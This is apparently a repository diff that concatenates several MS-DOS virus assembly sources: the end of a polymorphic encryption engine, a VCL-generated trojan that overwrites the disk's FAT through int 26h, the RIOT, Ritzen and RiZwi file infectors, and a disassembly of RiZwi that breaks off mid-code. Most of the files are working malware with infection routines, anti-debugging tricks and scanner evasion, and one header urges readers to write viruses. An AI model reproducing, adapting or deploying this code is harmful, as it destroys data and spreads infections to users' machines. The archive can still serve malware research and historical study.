db 0dh,0ah,0dh,0ah
db 'Most strangely, Kantza-Merada, are the laws of the '
db 'dark world effected.',0dh,0ah
db 'O Kantza-Merada, do not question the laws of the '
db 'nether world.',0dh,0ah,0dh,0ah
db 'The goddess from the great above descended to the '
db 'great below.',0dh,0ah
db 'To the nether world of darkness she descended.',0dh,0ah
db 'The goddess abandoned heaven, abandoned earth,',0dh,0ah
db 'Abandoned dominion, abandoned ladyship,',0dh,0ah
db 'To the nether world of darkness she descended.$'
endprog:
;------ Engine starts here.
mut_eng: mov di, offset resulting_code
inc cx
shr cx,1
mov word ptr [di-(resulting_code-cntr)],cx
call get_rand
mov ah,al
call get_rand
mov word ptr [di-(resulting_code-seed)],ax
push bp
push dx
call get_rand
and ax, 1
call do_garbage_manual
mov cx, 9
genloop: push cx
call get_rand
and ax,0fh
inc ax
xchg ax,cx
gloop: push cx
call do_garbage
pop cx
loop gloop
mov ax, 0c72eh
stosw
mov al, 06
stosb
pop cx
mov bx,cx
add bx,bx
mov word ptr ds:[workspace-2+bx],di
stosw
stosw
loop genloop
pop si
pop bp
mov al, 0e9h
stosb
mov cx, word ptr cntr
mov ax,cx
add ax,cx
stosw
add ax, (endframe-framework)
neg ax
mov jmpback, ax
lea bx, [di+bp+(-(offset resulting_code))]
mov word ptr ptr, bx
cryptloop:
lodsw
xor ax, word ptr seed
stosw
loop cryptloop
mov dx,di
push di
mov si, offset framework
mov bx, offset resulting_code
push bx
sub bp,bx
mov cx,9
fill_loop: dec bx
dec bx
mov di, word ptr [bx]
lea ax, [bp+si+(-(offset framework))]
add ax,dx
stosw
movsw
loop fill_loop
pop dx
pop cx
sub cx,dx
ret
get_rand: in al,40h
rol al,1 ;RNG v2.0
xor al, 0ffh
org $-1
Randomize db ?
mov randomize,al
ret
do_garbage: call get_rand
and ax, 0fh
do_garbage_manual:
mov bx,ax
mov bl, byte ptr [calltable+bx]
xor bh,bh
lea bp, [bx+poly]
interpret_string:
mov si,bp
cwd
lodsb
mov dh,al
test dh,16
jz dont_quote
lodsb
mov dl,al
dont_quote: test dh,8
jz dont_select
lodsb
cbw
xchg ax,cx
call get_rand
xor ah,ah
div cl
xchg al,ah
cbw
xchg ax,bx
mov dl, byte ptr ds:[si+bx]
add si,cx
dont_select: test dh,4
jz no_random_masking
call get_rand
and al, byte ptr ds:[si]
or dl,al
inc si
no_random_masking:
test dh,2
jz no_illegal
lodsb
and al,dl
inc si
cmp al, byte ptr ds:[si-1]
jz interpret_string
no_illegal: mov bp,si
mov al,dl
stosb
test dh,1
jz no_jmp
lodsb
cbw
add bp,ax
no_jmp: cmp byte ptr ds:[bp],0
jnz interpret_string
ret
calltable: db rnd_mov_8 - poly
db rnd_mov_16 - poly
db onebyte - poly
db incs - poly
db incs - poly
db arithmetic_8 - poly
db arithmetic_16 - poly
db big_class_0_40 - poly
db onebyte - poly
db big_class_40_80 - poly
db big_class_80_c0 - poly
db big_class_c0_100 - poly
db rnd_mov_8 - poly
db rnd_mov_16 - poly
db rnd_mov_8 - poly
db rnd_mov_16 - poly
endcalltable:
poly:
big_class_0_40: db 00010100b,00000010b,00111001b,00000110b,00011111b
db 00000111b,6,00
big_class_40_80:db 00010100b,00100010b,00011001b,00010111b,01000000b
db 00011111b,00000111b,6,rndbyte-$
big_class_80_c0:db 00010100b,00100010b,00011001b,00010111b,10000000b
db 00011111b,00000111b,6,rndword-$
big_class_c0_100:
db 00010100b,00100010b,00011001b,00010110b,11000000b
db 00011111b,00000111b,6,00
flow_control: db 00010100b,72h,7,00010000b,0,0
arithmetic_8: db 00010101b,00000100b,00111000b,rndbyte-$
arithmetic_16: db 00010101b,00000101b,00111000b,rndword-$
rnd_mov_8: db 00010101b,0b0h,7,rndbyte-$
rnd_mov_16: db 00010110b,0b8h,07,07,04
rndword: db 00000100b,0ffh
rndbyte: db 00000100b,0ffh,0
incs: db 00010110b,40h,0fh,7,4,0
onebyte: db 00001000b,(end_onebyters-onebyters)
onebyters: db 0fdh,0fch,0fbh,0f9h,0f8h,0f5h,0d7h,9fh,9eh,99h,98h
db 91h,92h,93h,95h,96h,97h
end_onebyters: db 0
framework: cld
mov si, 1234h
ptr equ $-2
mov cx, 1234h
cntr equ $-2
frameloop: xor word ptr cs:[si], 1234h
seed equ $-2
lodsw
loop frameloop
db 0e9h
jmpback dw ?
endframe:
workspace db endframe-framework dup (?)
resulting_code:
end start
MSDOS/R-Index/Virus.MSDOS.Unknown.richards.asm
+83
View File
@@ -0,0 +1,83 @@
; RICHARDS.ASM -- R. Simmons Trojan
; Created with Nowhere Man's Virus Creation Laboratory v1.00
; Written by Nowhere Man
virus_type equ 3 ; Trojan Horse
is_encrypted equ 1 ; We're encrypted
tsr_virus equ 0 ; We're not TSR
code segment byte public
assume cs:code,ds:code,es:code,ss:code
org 0100h
start label near
main proc near
call encrypt_decrypt ; Decrypt the virus
start_of_code label near
stop_tracing: mov cx,09EBh
mov ax,0FE05h ; Acutal move, plus a HaLT
jmp $-2
add ah,03Bh ; AH now equals 025h
jmp $-10 ; Execute the HaLT
mov bx,offset null_vector ; BX points to new routine
push cs ; Transfer CS into ES
pop es ; using a PUSH/POP
int 021h
mov al,1 ; Disable interrupt 1, too
int 021h
jmp short skip_null ; Hop over the loop
null_vector: jmp $ ; An infinite loop
skip_null: mov byte ptr [lock_keys + 1],130 ; Prefetch unchanged
lock_keys: mov al,128 ; Change here screws DEBUG
out 021h,al ; If tracing then lock keyboard
mov si,offset data00 ; SI points to data
mov ah,0Eh ; BIOS display char. function
display_loop: lodsb ; Load the next char. into AL
or al,al ; Is the character a null?
je disp_strnend ; If it is, exit
int 010h ; BIOS video interrupt
jmp short display_loop ; Do the next character
disp_strnend:
mov ax,0002h ; First argument is 2
mov cx,0010h ; Second argument is 16
cli ; Disable interrupts (no Ctrl-C)
cwd ; Clear DX (start with sector 0)
int 026h ; DOS absolute write interrupt
sti ; Restore interrupts
mov ax,04C00h ; DOS terminate function
int 021h
main endp
data00 db "C'mon now, trim that FAT! 1 and 2 and 3 and....",13,10,10,0
vcl_marker db "[VCL]",0 ; VCL creation marker
note db "The Richard Simmons Trojan; gu"
db "aranteed to get rid of that un"
db "sightly FAT in no time!",0
db "[Richard Simmons Trojan]",0
db "Nowhere Man, [NuKE] '92",0
end_of_code label near
encrypt_decrypt proc near
mov si,offset start_of_code ; SI points to code to decrypt
mov cx,(end_of_code - start_of_code) / 2 ; CX holds length
xor_loop: xor word ptr [si],06734h ; XOR a word by the key
inc si ; Do the next word
inc si ;
loop xor_loop ; Loop until we're through
ret ; Return to caller
encrypt_decrypt endp
finish label near
code ends
end main
MSDOS/R-Index/Virus.MSDOS.Unknown.riot.asm
+186
View File
@@ -0,0 +1,186 @@
From netcom.com!ix.netcom.com!netnews Sat Nov 12 17:11:15 1994
Xref: netcom.com alt.comp.virus:200
Path: netcom.com!ix.netcom.com!netnews
From: Zeppelin@ix.netcom.com (Mr. G)
Newsgroups: alt.comp.virus
Subject: Re:Riot
Date: 12 Nov 1994 03:37:30 GMT
Organization: Netcom
Lines: 171
Distribution: world
Message-ID: <3a1d9q$ma6@ixnews1.ix.netcom.com>
References: <3a0s7b$r6i$1@mhadf.production.compuserve.com> <3a1aj7$l5e@ixnews1.ix.netcom.com> <3a1cri$m31@ixnews1.ix.netcom.com>
NNTP-Posting-Host: ix-ir4-21.ix.netcom.com
; RIOT! - Revolution In Our Time
model tiny
code
org 100h
start:
; push ax ; Original push "ax",
PUSH DX ; But push dx instead,
; and S&S FindViru can't
; find it as NINA-256 :)
mov ax,9753h ; installation check
int 21h
mov ax,ds
dec ax
mov ds,ax ; ds->program MCB
mov ax,ds:[3] ; get size word
push bx
push es
sub ax,40h ; reserve 40h paragraphs
mov bx,ax
mov ah,4Ah ; Shrink memory
allocation
int 21h
mov ah,48h ; Allocate 3Fh
paragraphs
mov bx,3Fh ; for the virus
int 21h
mov es,ax ; copy virus to high
xor di,di ; memory
mov si,offset start + 10h ; start at MCB:110h
mov cx,100h ; (same as PSP:100h)
rep movsb
sub ax,10h ; adjust offset as if it
push ax ; originated at 100h
mov ax,offset highentry
push ax
retf
highentry:
mov byte ptr cs:[0F2h],0AAh ; change MCB's owner so
the
; memory isn't freed
when the
; program terminates
mov ax,3521h ; get int 21h vector
int 21h
mov word ptr cs:oldint21,bx ; save it
mov word ptr cs:oldint21+2,es
push es
pop ds
mov dx,bx
mov ax,2591h ; redirect int 91h to
int 21h
int 21h
push cs
pop ds
mov dx,offset int21
mov al,21h ; set int 21h to virus
vector
int 21h
pop ds ; ds->original program
PSP
pop bx
push ds
pop es
ENDFILE dw 100h ; Size of infected COM
file
return_COM:
mov di,100h ; restore original
mov si,endfile ; file
add si,di ; adjust for COM
starting
mov cx,100h ; offset
rep movsb
pop ax
push ds ; jmp back to original
mov bp,100h ; file (PSP:100)
push bp
retf
exit_install:
pop ax ; pop CS:IP and flags in
pop ax ; order to balance the
pop ax ; stack and then exit
the
jmp short return_COM ; infected COM file
int21:
cmp ax,9753h ; installation check?
je exit_install
cmp ax,4B00h ; execute?
jne exitint21 ; nope, quit
push ax ; save registers
push bx
push cx
push dx
push ds
call infect
pop ds ; restore registers
pop dx
pop cx
pop bx
pop ax
exitint21:
db 0eah ; jmp far ptr
oldint21 dd ?
infect:
mov ax,3D02h ; open file read/write
int 91h
jc exit_infect
mov bx,ax
mov cx,100h
push cs
pop ds
mov ah,3Fh ; Read first 100h bytes
mov dx,offset endvirus
int 91h
mov ax,word ptr endvirus
cmp ax,'MZ' ; exit if EXE
je close_exit_infect
cmp ax,'ZM' ; exit if EXE
je close_exit_infect
cmp word ptr endvirus+2,9753h ; exit if already
je close_exit_infect ; infected
mov al,2 ; go to end of file
call move_file_pointer
cmp ax,0FEB0h ; exit if too large
ja close_exit_infect
cmp ax,1F4h ; or too small for
jb close_exit_infect ; infection
mov endfile,ax ; save file size
call write
mov al,0 ; go to start of file
call move_file_pointer
mov dx,100h ; write virus
call write
close_exit_infect:
mov ah,3Eh ; Close file
int 91h
exit_infect:
retn
move_file_pointer:
push dx
xor cx,cx
xor dx,dx
mov ah,42h
int 91h
pop dx
retn
write:
mov ah,40h
mov cx,100h
int 91h
retn
db ' RIOT!' ; Revolution In Our Time!
endvirus:
int 20h ; original COM file
end start
MSDOS/R-Index/Virus.MSDOS.Unknown.ritzen.asm
+495
View File
@@ -0,0 +1,495 @@
;*****************************************************************************
;* *
;* The Ritzen Virus *
;* *
;* (c) '93, by S.A.R. (Students Agains Ritzen) / TridenT *
;* *
;*****************************************************************************
.model tiny
.radix 16
.code
len equ offset last - atlantic
len_para equ len /10h
mem_size equ 60h
org 100h
dummy: db 0e9h,00h,00h ; dummy file,
; contains jump to
; virus code.
atlantic: call get_ip
sub bp,offset atlantic+3
rest_host: push ds
pop ax
mov cs:[segm+bp],ax
cmp cs:[type_host+bp],'E' ; check if host
je fix_exe ; is COM or EXE.
fix_com: lea si,cs:[com_start+bp] ; fix start of
mov ax,es
inc ax
mov es,ax
mov di,00F0h ; com host with
mov cx,03h ; original data.
rep movsb
mov ax,es
dec ax
mov es,ax
mov ax,0100h ; IP start at 0100h.
push cs ; store segment+IP
push ax ; on stack.
jmp chk_resident
fix_exe: mov ax,cs:[exe_cs+bp] ; CS and IP on stack
mov bx,ax
mov ax,ds
add ax,bx
add ax,10h
push ax
mov bx,cs:[exe_ip+bp]
push bx
chk_resident: mov dx,0aaaah
mov ax,3000h
int 21h
cmp dx,0bbbbh
je end_install
mem_install: push ds ; let DS points
push ds
pop ax ; to MCB
dec ax ; 2 times to fool
dec ax ; heuristic scanners
push ax
pop ds
cmp byte ptr ds:[0010],5ah ; last MCB?
jne abort_install ; if no, quit.
mov ax,ds:[0013] ; adjust memory
sub ax,mem_size ; size.
mov ds:[0013],ax ; store size in MCB.
pop ds ; restore original
; DS segment.
sub word ptr ds:[0002],mem_size ; don't forget to
; adjust memory
; size stored in
; PSP to.
vir_install: xchg ax,bx ; install virus
mov ax,es
add ax,bx ; AX = virussegment
mov es,ax
mov cs:[vir_seg+bp],ax
push cs
pop ds
lea si,[atlantic+bp] ; copy virus to
lea di,es:0103h ; memory
mov cx,len
copy: movsb
dec cx
jnz copy
push ds
pop es
hook_i21h: cli
mov ax,3521h
int 21h
mov ds,cs:[vir_seg+bp]
mov [i21h],bx
mov [i21h+2],es
; mov dx, offset ds:[mine_i21h]
; mov ax,2521h
; int 21h
mov ax,ds
mov bx,ax
mov dx, offset ds:[mine_i21h]
xor ax,ax
mov ds,ax
mov ds:[4*21h],dx
mov ds:[4*21h+2],bx
sti
abort_install: mov ax,cs:[segm+bp]
push ax
pop es
push es
pop ds
end_install: retf
;*************************************************************************
;* *
;* I N T E R U P T H A N D L E R *
;* *
;*************************************************************************
mine_i24h: mov al,03h
iret
mine_i21h: pushf ; check for
cmp ax,3000h ; virus ID
jne new_21h
cmp dx,0aaaah
jne new_21h
mov dx,0bbbbh ; return ID
popf
iret
new_21h: push ax ; save registers
push bx
push cx
push dx
push ds
push es
push di
push si
chk_open: xchg ax,bx
cmp bh,3dh ; open file?
je chk_com
chk_exec: cmp bx,04b00h ; execute file?
je chk_com
continu: pop si ; restore registers
pop di
pop es
pop ds
pop dx
pop cx
pop bx
pop ax
next: popf ; call original
jmp dword ptr cs:[i21h] ; interupt
;**************************************************************************
;* *
;* C H E C K C O M / E X E F I L E *
;* *
;**************************************************************************
chk_com: mov cs:[name_seg],ds
mov cs:[name_off],dx
cld
mov cx,0ffh
push ds
pop es
push dx
pop di
mov al,'.'
repne scasb
cmp word ptr es:[di],'OC'
jne chk_exe
cmp word ptr es:[di+2],'M'
jne continu
jmp infect_com
chk_exe: cmp word ptr es:[di],'XE'
jne continu
cmp word ptr es:[di+2],'E'
jne continu
jmp infect_exe
;**************************************************************************
;* *
;* I N F E C T C O M - F I L E *
;* *
;**************************************************************************
infect_com: call init
cmp cs:[fout],0ffh
je close_file
mov cs:[type_host],'C'
mov ax,4200h ; go to start of file
call mov_point
mov cx,03h
mov ah,3fh
lea dx,cs:[com_start]
call do_int21h
mov ax,4200h
call mov_point
mov ax,4202h
call mov_point
sub ax,03h
mov cs:[lenght_file],ax
call write_jmp
call write_vir
call save_date
close_file: mov bx,cs:[handle]
mov ah,3eh
call do_int21h
restore_int24h: mov dx,cs:[i24h]
mov ds,cs:[i24h+2]
mov ax,2524h
call do_int21h
jmp continu
;**************************************************************************
;* *
;* I N F E C T E X E - F I L E *
;* *
;**************************************************************************
infect_exe: call init
cmp cs:[fout],0ffh
je close_file
mov cs:[type_host],'E'
mov ax,4200h
call mov_point
mov ah,3fh
mov cx,18h
lea dx,[head_exe]
call do_int21h
call inf_exe
call save_date
jmp close_file
;**************************************************************************
;* *
;* R O U T I N E S *
;* *
;**************************************************************************
get_ip: push sp ; get ip from stack
pop bx
mov ax, word ptr cs:[bx]
mov bp,ax
ret
init: mov cs:[fout],00h
call int24h
call open_file
jc error
call set_atributes
call get_date
call chk_infect
je error
ret
error: mov cs:[fout],0ffh
ret
int24h: push cs
pop ds
mov ax,3524h
call do_int21h
mov cs:[i24h],bx
mov cs:[i24h+2],es
mov dx, offset mine_i24h
mov ax,2524h
call do_int21h
ret
mov_point: push cs
pop ds
mov bx,cs:[handle]
xor cx,cx
xor dx,dx
call do_int21h
ret
open_file: mov ds,cs:[name_seg]
mov dx,cs:[name_off]
mov ax,3d02h
call do_int21h
mov cs:[handle],ax
mov bx,ax
ret
set_atributes: mov ax,4200h
mov ds,cs:[name_seg]
mov dx,cs:[name_off]
call do_int21h
and cl,0feh
mov ax,4301h
call do_int21h
ret
get_date: mov bx,cs:[handle]
mov ax,5700h
call do_int21h
mov cs:[date],dx
mov cs:[time],cx
ret
chk_infect: push cs
pop ds
mov ax,4202h
xor cx,cx
sub cx,01h
xor dx,dx
sub dx,02h
mov bx,cs:[handle]
call do_int21h
mov ah,3fh
mov cx,02h
lea dx,cs:[file_id]
call do_int21h
mov al, byte ptr cs:[file_id]
mov ah, byte ptr cs:[file_id]+1
cmp ax,[virus_id]
ret
write_jmp: push cs
pop ds
mov ax,4200h
call mov_point
mov ah,40h
mov cx,01h
lea dx,cs:[jump]
call do_int21h
mov ah,40h
mov cx,02h
lea dx,cs:[lenght_file]
call do_int21h
ret
write_vir: push cs
pop ds
mov ax,4202h
call mov_point
mov ah,40h
mov cx,len
mov dx,103h
call do_int21h
ret
save_date: mov ax,5700h
call do_int21h
mov cs:[date],dx
mov cs:[time],cx
ret
inf_exe: mov ax,word ptr cs:[head_exe+14h]
mov cs:[exe_ip],ax
mov ax, word ptr cs:[head_exe+16h]
mov cs:[exe_cs],ax
mov ax,4200h
call mov_point
mov ax,4202h
call mov_point
mov bx,10h
div bx
sub ax, word ptr cs:[head_exe+08h]
mov cs:[new_cs],ax
mov cs:[new_ip],dx
call write_vir
mov ax,4200h
call mov_point
mov ax,4202h
call mov_point
mov bx,0200h
div bx
cmp dx,0000h
jne not_zero
jmp zero
not_zero: inc ax
zero: mov word ptr cs:[head_exe+02h],dx
mov word ptr cs:[head_exe+04h],ax
mov ax,cs:[new_ip]
mov word ptr cs:[head_exe+14h],ax
mov ax,cs:[new_cs]
mov word ptr cs:[head_exe+16h],ax
mov word ptr cs:[head_exe+0Eh],ax
add word ptr cs:[head_exe+10],len_para
; mov word ptr cs:[head_exe+10],1000
mov ax,4200h
call mov_point
mov ah,40h
mov bx,cs:[handle]
mov cx,18h
lea dx,cs:[head_exe]
call do_int21h
ret
do_int21h: pushf
call dword ptr cs:[i21h]
ret
;****************************************************************************
;* *
;* D A T A *
;* *
;****************************************************************************
type_host db 'C'
com_start db 0cdh,20h,90h
message db " Dedicated to Ritzen, our Minister of Education and Science."
db " We are getting sick of your budget cuts so we hope that"
db " you get sick of this virus.."
db " (c) '93 by S.A.R. / TridenT ."
exe_cs dw ?
exe_ip dw ?
new_cs dw ?
new_ip dw ?
vir_seg dw ?
i21h dw 00h,00h
i24h dw 00h,00h
name_seg dw ?
name_off dw ?
lenght_file dw ?
head_exe db 18 dup (?)
handle dw ?
fout db ?
file_id dw ?
jump db 0e9h
date dw ?
time dw ?
segm dw ?
virus_id dw "AP"
last dw "AP"
end dummy
MSDOS/R-Index/Virus.MSDOS.Unknown.rizwi.a86
+256
View File
@@ -0,0 +1,256 @@
;
; RiZwi Virus by John Tardy / Trident V1.1
;
; This is a tom-resident .com infector, including command.com. it attaches
; itself at the eof. when the generation counter is between 200 and 240, a
; timer counter will be started. when it reached 5000 hex ticks, it will
; display a message with black chars and a red background in the upper corner.
; The message says an important fact of Righard Zwienenberg, who is known in
; The Netherlands as a anti-virus researcher. In fact, he did release a virus,
; named "DUTCH-555". I know he did it accidentally, but you should do it. You
; have to be on just one side, virus or antivirus. If you can't choose, then
; stop with computing. If you choose, I hope you choose our side. It has more
; possibilities and with your capabilities your virii could be well-known
; (look at the VSUM for your ratings). Maybe you even choose to be part of
; [NUkE] or Phalcon/Skism or even Trident.
;
; This is a bug-fix of V1.0, which kept the original interupt in the main
; program, thus simply hanging. This one has also a little debugger trap.
Org 100h
Prg: Call On1
On1: Pop Bp
Sub Bp,On1
Mov Ah,30h
Int 21h
Cmp Bx,'BC'
Je Tooz
Mov Ah,2ah
Int 21h
In Al,21h
Cmp Cx,1993
Ja MakeRes
Cmp Dh,4
Ja MakeRes
Tooz: Jmp DoCom
MakeRes: Or Al,02h
Push Ax
Mov Ax,351ch
Int 21h
Mov Word Ptr Cs:Old1c[0][Bp],Bx
Mov Word Ptr Cs:Old1c[2][Bp],es
Pop Ax
Out 21h,Al
CutIt: Mov Ax,3521h
Int 21h
Mov Word Ptr Cs:Old21[0][Bp],Bx
Mov Word Ptr Cs:Old21[2][Bp],Es
In Al,21h
And Al,2
Push Ax
Mov Ax,Cs
Dec Ax
Mov Ds,Ax
Cmp Byte Ptr Ds:[0],'Z'
Jne DoCom
Sub Word Ptr Ds:[3],PrgPar
Sub Word Ptr Ds:[12h],PrgPar
Lea Si,Prg[Bp]
Mov Di,100h
Pop Ax
Cmp Al,2
Jne CutIt
Mov Ax,Word Ptr Ds:[12h]
Sub Ax,10h
Mov Es,Ax
Mov Cx,PrgLen
Push Cs
Pop Ds
Rep Movsb
In Al,21h
Xor Al,2
Mov Ds,Es
Out 21h,Al
Mov Ax,251ch
Lea Dx,New1c
Int 21h
Mov Ax,2521h
Lea Dx,New21
Int 21h
DoCom: Push Cs
Pop Ds
Mov Es,Ds
Mov Di,100h
Push Di
Lea Si,OrgPrg[Bp]
Movsw
Movsb
Ret
OrgPrg DB 0CDh,020h
DB ''
Db '[TridenT]'
Dos: Pushf
Call Dword Ptr Cs:[Old21]
Ret
Db '{V1.1 Bugfix}'
Old21 DD 0
New21: Cmp Ax,4b00h
Je Exec
Cmp Ah,30h
Jne EOI
Call Dos
Mov Bx,'BC'
Iret
EOI: Jmp Dword Ptr Cs:[Old21]
Exec: Push Ax
Push Bx
Push Cx
Push Dx
Push Si
Push Di
Push Ds
Push Es
Push Bp
Push Ds
Push Dx
Mov Ax,4300h
Call Dos
Mov FAttr,Cx
Xor Cx,Cx
Mov Ax,4301h
Call Dos
Mov Ax,3d02h
Call Dos
Mov FHandle,Ax
Xchg Ax,Bx
Mov Ax,5700h
Call Dos
Mov Word Ptr Cs:[FTime],Cx
Mov Word Ptr Cs:[FDate],Dx
And Cx,1fh
Cmp Cx,1fh
Jne DoMore
Close: Mov Ah,3eh
Call Dos
Pop Dx
Pop Ds
Mov Cx,FAttr
Mov Ax,4301h
Call Dos
Jmp ShutDown
DoMore: Mov Ah,3fh
Push Cs
Pop Ds
Lea Dx,OrgPrg
Mov Cx,3
Call Dos
Cmp Word Ptr Cs:[OrgPrg],'MZ'
Je Close
Cmp Word Ptr Cs:[OrgPrg],'ZM'
Je Close
Mov Ax,4202h
Xor Cx,Cx
Xor Dx,Dx
Call Dos
Sub Ax,3
Mov Jump,Ax
Mov Ah,40h
Lea Dx,Prg
Mov Cx,PrgLen
Call Dos
Mov Ax,4200h
Xor Cx,Cx
Xor Dx,Dx
Call Dos
Mov Ah,40h
Lea Dx,Start
Mov Cx,3
Call Dos
Mov Ax,5701h
Mov Cx,FTime
Mov Dx,FDate
Or Cx,1fh
Call Dos
Inc Byte Ptr Cs:[FileCount]
Jmp Close
ShutDown: Pop Bp
Pop Es
Pop Ds
Pop Di
Pop Si
Pop Dx
Pop Cx
Pop Bx
Pop Ax
Jmp EOI
Old1c DD 0
New1c: pushf
push ax
push cx
push si
push di
push ds
push es
Cmp Byte Ptr Cs:[FileCount],200
Jb EOI16
Cmp Byte Ptr Cs:[FileCount],240
Ja EOI16
Cmp Word Ptr Cs:[ActCount],5000h
Je Activate
Inc Word Ptr Cs:[ActCount]
Jmp EOI16
Activate:
Mov Ds,Cs
Mov Ax,0b800h
Mov Es,Ax
Lea Si,ScrMsg
Mov Di,160
Sub Di,ScrLen
Mov Cx,ScrLen
Rep MovSb
EOI16: pop es
pop ds
pop di
pop si
pop cx
pop ax
popf
iret
ScrMsg Db ' OROiOgOhOaOrOdO OZOwOiOeOnOeOnObOeOrOgO OmOaOdOeO OtOhOeO ODOUOTOCOHO-O5O5O5O OVOiOrOuOsO!O!O!O O'
ScrLen Equ $-ScrMsg
FileCount Db 0
ActCount Dw 0
Start Db 0e9h
Jump Dw 0
FAttr Dw 0
FHandle Dw 0
FDate Dw 0
FTime Dw 0
PrgLen Equ $-Prg
PrgPar Equ (PrgLen+0fh)/16
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> ReMeMbEr WhErE YoU sAw ThIs pHile fIrSt <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄ> ArReStEd DeVeLoPmEnT +31.77.SeCrEt H/p/A/v/AV/? <ÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
MSDOS/R-Index/Virus.MSDOS.Unknown.rizwi.asm
+297
View File
@@ -0,0 +1,297 @@
;Rizwi Virus from the TridenT research group.
;Memory resident .COM infector.
;This virus is only active after the spring of 1994.
;When active, it infects .COM files on execution, and keeps
;track of the number of files that it has infected. While it has
;infected between 0C8h and 0f0h files, it displays the message
;that " Righard Zwienenberg made the DUTCH-555 virus!!! " on
;the screen.
;This virus has some anti-debugging code, as it masks the keyboard
;interrupt and checks to see if it remaines masked, so when debugging
;through it one must jump over these sections of code (In/Out port 21h
;and the checking of ax accompanying them).
;Disassembly by Black Wolf
.model tiny
.code
org 100h
start:
call Get_Offset
Get_Offset:
pop bp
sub bp,offset Get_Offset
mov ah,30h
int 21h ;Get Dos version/Install Check
cmp bx,4243h
je DoneInstall ;Already Installed
mov ah,2Ah
int 21h ;Get date
in al,21h ;Read interrupt masks...
cmp cx,1993 ;Is year later than 1993?
ja GoMemRes ;If not, exit.
cmp dh,4
ja GoMemRes ;Is month < May, exit.
DoneInstall:
db 0e9h,74h,0 ;jmp ReturnToHost
GoMemRes:
or al,2
push ax
mov ax,351Ch
int 21h ;Get timer interrupt
mov cs:[Int1cIP+bp],bx
mov cs:[Int1cCS+bp],es
pop ax
out 21h,al ;Interrupt - disable keyboard?
SetInterrupts:
mov ax,3521h
int 21h ;Get int 21 address
mov word ptr cs:[OldInt21+bp],bx
mov word ptr cs:[OldInt21+2+bp],es
in al,21h
and al,2
push ax
mov ax,cs
dec ax
mov ds,ax ;Set DS = MCB
cmp byte ptr ds:0,'Z' ;Are we at the end of the
jne ReturnToHost ;memory chain?
;sub word ptr ds:[3],27h ;Decrease MCB size
db 81h,2eh,03,0,27h,0
;sub word ptr ds:[12h],27h ;Decrease PSP top of memory
db 81h,2eh,12h,0,27h,0
lea si,[bp+100h] ;SI = beginning of virus
mov di,100h ;DI = new offset (100h)
pop ax
cmp al,2 ;Did someone skip interrupt
jne SetInterrupts ;disabling code? If so,
;loop them back to redo
;interrupt setting.
mov ax,ds:[12h] ;Get free segment
sub ax,10h ;Subtract 10h to account for
mov es,ax ; offset of 100h
mov cx,263h
push cs
pop ds
rep movsb ;Copy virus into memory
in al,21h
xor al,2
push es
pop ds
out 21h,al ;Do the keyboard int again...
mov ax,251Ch
mov dx,offset Int1cHandler
int 21h ;Set int 1ch
mov ax,2521h
mov dx,offset Int21Handler
int 21h ;Set int 21h
ReturnToHost:
push cs ;Restore Seg regs
pop ds
push ds
pop es
mov di,100h
push di
lea si,[bp+Storage_Bytes] ;Storage bytes
movsw
movsb ;Restore host
ret
Storage_Bytes:
int 20h
popf
TridenT_ID db '[TridenT]'
FakeInt21h:
pushf
call dword ptr cs:OldInt21 ;Fake Interrupt 21h
retn
VirusVersion db '{V1.1 Bugfix}'
OldInt21 dw 0, 0
Int21Handler:
cmp ax,4b00h
je IsExecute
cmp ah,30h
jnz ExitInt21
call FakeInt21h
mov bx,4243h
iret
ExitInt21:
jmp dword ptr cs:OldInt21
IsExecute:
push ax bx cx dx si di ds es bp ds dx
mov ax,4300h
call FakeInt21h ;Get attributes
mov FileAttribs,cx ;Save them
xor cx,cx
mov ax,4301h ;Reset Attributes
call FakeInt21h
mov ax,3D02h ;Open file
call FakeInt21h
mov Filehandle,ax
xchg ax,bx
mov ax,5700h
call FakeInt21h ;Get file date/time
mov cs:[FileTime],cx ; and save them
mov cs:[FileDate],dx
and cx,1Fh
cmp cx,1Fh ;Check infection in time stamp
jne Infect_File
CloseFile:
mov ah,3Eh
call FakeInt21h
pop dx ;Pop filename address
pop ds
mov cx,FileAttribs
mov ax,4301h
call FakeInt21h ;Reset Attributes
db 0e9h, 67h, 0 ;jmp DoneInfect
Infect_File:
mov ah,3Fh
push cs
pop ds
mov dx,offset Storage_Bytes
mov cx,3
call FakeInt21h ;Read in first 3 bytes
cmp word ptr cs:[Storage_Bytes],4D5Ah ;Is EXE?
je CloseFile
cmp word ptr cs:[Storage_Bytes],5A4Dh ;Is alternate EXE?
je CloseFile
mov ax,4202h
xor cx,cx
xor dx,dx
call FakeInt21h ;Go to the end of file
sub ax,3 ;adjust size for jump
mov word ptr [JumpSize],ax ;save jump size
mov ah,40h
mov dx,100h
mov cx,263h
call FakeInt21h ;Append Virus to host
mov ax,4200h
xor cx,cx
xor dx,dx ;Go to beginning
call FakeInt21h ;of host file.
mov ah,40h
mov dx,358h
mov cx,3
call FakeInt21h ;Write Jump bytes
mov ax,5701h
mov cx,[FileTime]
mov dx,[FileDate]
or cx,1Fh ;Mark infection in time stamp
call FakeInt21h ;Restore time/date
inc byte ptr cs:[Counter] ;Activation counter...
jmp short CloseFile
DoneInfect:
pop bp es ds di si dx cx bx ax
jmp ExitInt21
Int1cIP dw 0
Int1cCS dw 0
Int1cHandler: ;While infections are between C8h and F0h,
;Stick message on screen every once in a while.
pushf
push ax cx si di ds es
cmp byte ptr cs:[Counter],0C8h
jb ExitInt1c
cmp byte ptr cs:[Counter],0F0h
ja ExitInt1c
cmp word ptr cs:[TimerCount],5000h
je WriteMessageToScreen
inc word ptr cs:[TimerCount]
db 0e9h,16h,0 ;jmp ExitInt1c
WriteMessageToScreen:
push cs
pop ds
mov ax,0B800h ;Text Screen memory
mov es,ax
mov si,offset Message
mov di,0A0h
